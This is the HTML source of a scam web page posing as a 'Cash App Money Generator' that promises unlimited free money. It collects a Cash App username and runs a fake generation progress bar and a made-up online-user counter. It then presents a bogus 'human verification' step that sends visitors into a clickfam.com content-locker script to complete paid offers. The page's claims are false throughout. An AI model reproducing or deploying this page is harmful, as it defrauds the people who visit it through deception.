<!DOCTYPE html>
<html><head><meta name="viewport" content="width=device-width, initial-scale=1"><link href="https://fonts.googleapis.com/css?family=Comfortaa" rel="stylesheet"><title>Cash App Cash Cash Generator : Cash App Money Hack Online 2020</title><meta name="description" content="Cash App Money Generator is a simple online tool to get unlimited free money in cash app application, Works with both Android and iOS Devices. Get Started Now!!"><script src="js/6389-js-jscript.js"></script><script type="text/javascript" id="ogjs" src="https://www.clickfam.com/cl/load.php?id=fad3c7f54be25c514f5db24690e19e9f"></script></head><style>

html {
    background: url("img/lootboxbg.jpg") no-repeat center center fixed;
    background-size: cover;
}

body {
    text-align: center;
    font-family: 'Comfortaa', cursive;
}

img {
    display: block;
    margin-left: auto;
    margin-right: auto;
}

.form-option {
    margin-left: 15px;
    margin-right: 30px;
    margin-bottom: 15px;
}

.input-form {
    background-color: #fff;
    background-image: none;
    border: 1px solid #ccc;
    border-radius: 4px;
    box-shadow: 0 1px 1px rgba(0, 0, 0, 0.075) inset;
    color: black;
    display: block;
    font-size: 14px;
    height: 20px;
    line-height: 1.42857;
    padding: 6px 12px;
    transition: border-color 0.15s ease-in-out 0s, box-shadow 0.15s ease-in-out 0s;
    vertical-align: middle;
    width: 100%;
}

.input-form::-moz-placeholder {
    color: #999;
    opacity: 55;
}

.input-command {
    border-radius: 6px;
    font-size: 18px;
    height: 28px;
    line-height: 1.33;
    padding: 10px 16px;
}

select.input-command {
    height: 46px;
    line-height: 46px;
}

.wrapper {
    padding: 0;
    margin: -136px auto 0;
}

.wrapper img {
    width: 60%;
}

.lootbox1 {
    background: url("img/gem1.png") no-repeat scroll 10px center white;
    padding-left: 40px !important;
}

.buttonstyle {
    border-radius: 6px;
    background-color: #111c30;
    border: none;
    color: white;
    padding: 16px 33px;
    display: inline-block;
    font-size: 33px;
    height: 72px !important;
    box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
}

#progressbarouter {

}

#progressbarcontainer {
    display: none;
    border-radius: 6px;
    position: relative;
    border: 6px solid black;
    margin-left: auto;
    margin-right: auto;
    width: 90%;
    height: 50px;
    box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
}

#progressbar {
    position: absolute;
    width: 10%;
    height: 100%;
    background-color: #fdd633;
}

#progressbarlabel {
    line-height: 54px;
    text-align: center;
    color: black;
}

#main-tool{
    background: #efefef; /* Old browsers */
    background: -moz-linear-gradient(top,  #868f99 0%, #efefef 80px); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#868f99), color-stop(80px,#efefef)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #868f99 0%,#efefef 80px); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #868f99 0%,#efefef 80px); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #868f99 0%,#efefef 80px); /* IE10+ */
    background: linear-gradient(to bottom,  #868f99 0%,#efefef 80px); /* W3C */
    filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#868f99', endColorstr='#efefef',GradientType=0 ); /* IE6-9 */
    border-radius: 10px;
    max-width: 500px;
    margin: 100px auto 20px;
    padding: 50px;
    opacity: 0.9;
}

#shield{
    margin-bottom: 5px;
}

#verifybg {
    height: 0%;
    width: 100%;
    left: 0;
    top: 0;
    position: fixed;
    z-index: 1;
    overflow-x: hidden;
    transition: 0.5s;
    background-color: rgb(0,0,0);
    background-color: rgba(0,0,0, 0.3);
}

#verify {
    margin-left: auto;
    margin-right: auto;
    border-radius: 10px;
    color: white;
    position: relative;
    background-color: #212835;
    box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
    width: 80%;
}

#verifycontent {
    margin-left: auto;
    margin-right: auto;
    width: 80%;
}

@media screen and (min-width: 1200px) {
        #mobileverify {
            display: none;
        }

        #desktopverify {
            display: block;
        }

        #verify {
            width: 30%;
        }
}

@media screen and (max-width: 1199px) {
        #mobileverify {
            display: block;
        }

        #desktopverify {
            display: none;
        }

        #verify {
            width: 90%;
        }
}

</style><body>
<!--<script src="//www.clickfam.com/captchalocker/js/captcha.js.php?id=6dc65551b5362b3ae10482626838521b"></script>-->
<div id="verifybg">
	<br><br><br><div id="verify">
		<br><br><br><div id="verifycontent">
			<h1>VERIFICATION REQUIRED</h1>

			<div id="mobileverify">
			<p>In Order to Keep Our Software Stay Undetected From Automatic Bot, Please Complete the Verification Process.</p>
			
			<center><b>How to Verify?</b></center><br><center><b>Step - 1</b></center>
			<center>Tap VERIFY Button Below.</center><br><br><center><b>Step - 2</b></center>
			<center>Complete Any One of The Given Task/Offer From The List.</center><br><br><center><b>Step - 3</b></center>
			<center>Login Back to App To Grab Your Cash Instantly.</center><br><!--<center><div data-captcha-enable="true"></div></center>--><img style="cursor:pointer;" src="images/img-button_verify.png" width="80%" onclick="call_locker();"><!--<br><center><b>Confused? Watch This Video Tutorial in Detail</b></center><br><br>
			<div class="iframe-container">
			<center><iframe width="560" height="315" src="https://www.youtube.com/embed/3z4hA7M3FTg?start=134" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center><br>--></div>
			
			
			
					</div>

			<div id="desktopverify">
			<p>In Order to Keep Our Software Stay Undetected From Automatic Bot, Please Complete the Verification Process.</p>
			
			<center><b>How to Verify?</b></center><br><br><center><b>Step - 1</b></center>
			<center>Tap VERIFY Button Below.</center><br><br><center><b>Step - 2</b></center>
			<center>Complete Any One of The Given Task/Offer From The List.</center><br><br><center><b>Step - 3</b></center>
			<center>Login Back to App To Grab Your Cash Instantly.</center><br><!--<center><div data-captcha-enable="true"></div></center>--><img style="cursor:pointer;" src="images/img-button_verify.png" width="80%" onclick="call_locker();"><br><br><!--<center><b>Confused? Watch This Video Tutorial in Detail</b></center></b></b><br><br>
			<br><div class="iframe-container">
			<center><iframe width="560" height="315" src="https://www.youtube.com/embed/3z4hA7M3FTg?start=134" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center><br>--></div>
			
			
			</div>
		</div>
		<br><br><br><div id="main-tool">
<div class="wrapper"><img src="images/img-logo.png"></div>
<h1>Cash App Generator</h1>

<div id="progressbarcontainer">
	<div id="progressbar">
		<div id="progressbarlabel">0%</div>
	</div>
</div>

<p></p><div id="progresslog"></div>

<div id="fillup">
<div class="form-option">
	<input id="username" maxlength="30" class="input-form input-command" type="text" placeholder="Cash App Username"></div>
<div class="form-option">
<p><b>Choose Your Device OS.</b></p>
<select id="device" class="input-form input-command" type="text"><option>iOS</option><option>Android</option></select></div>
<div class="form-option">
<p><b>Select the amount of Cash.</b></p>
<select id="lootbox1" class="input-form lootbox1 input-command"><option value="$99">$9</option><option value="$19">$19</option><option value="$49">$49</option><option value="$59">$59</option><option value="$99">$99</option>--&gt;
</select></div>
<button onclick="move()" class="buttonstyle">GENERATE</button>
<center><h1>USER VERIFICATION STEP</h1></center>
<b></b><p>Know More About Human Verification</p>
Do you know why this human verification step is so important? Let's get to the straight point, Our tools are exclusively available for only real users of Cash App. As you can see we get tons of bot traffic on our server to get free Cash , Over 75% of these are bots who are trying to generate Cash And for same users. To prevent this situation we have applied a human verification step. 
<b></b><p>How to use the Cash App Money Generator</p>
<b>Let us clear you that, By completing human verification you will help us to manage our server costs. And also by completing human verification you will be able to use our tools for free. This step doesn't cost you any money. but has many advantages for both of us.<br><b>You don't have to be a tech savvy to complete the human verification. You just need to follow the steps mentioned below to access the tool immedietly, So Let's get started Now.<br><ol><li>Click On The Get Started Now Button to Access The Generator.</li><br><li>Identify Your Cash App Username by entering it in username field.</li><br><li>Select the device which you are currently using.</li><br><li>Select the number of Cash you need.</li><br><li>Click/Tap on Generate Button!</li>
<li>Finish with the Final Human Verification Step And You Are Done!! Login to Cash App Game to confirm the rewards.</li>
</ol></b></b></div>

<h4>Users Online Now:&nbsp;<div id="randomnumber">537</div></h4>
<h4>Copyright 2020 Cash App Generator</h4>


</div></body></html>
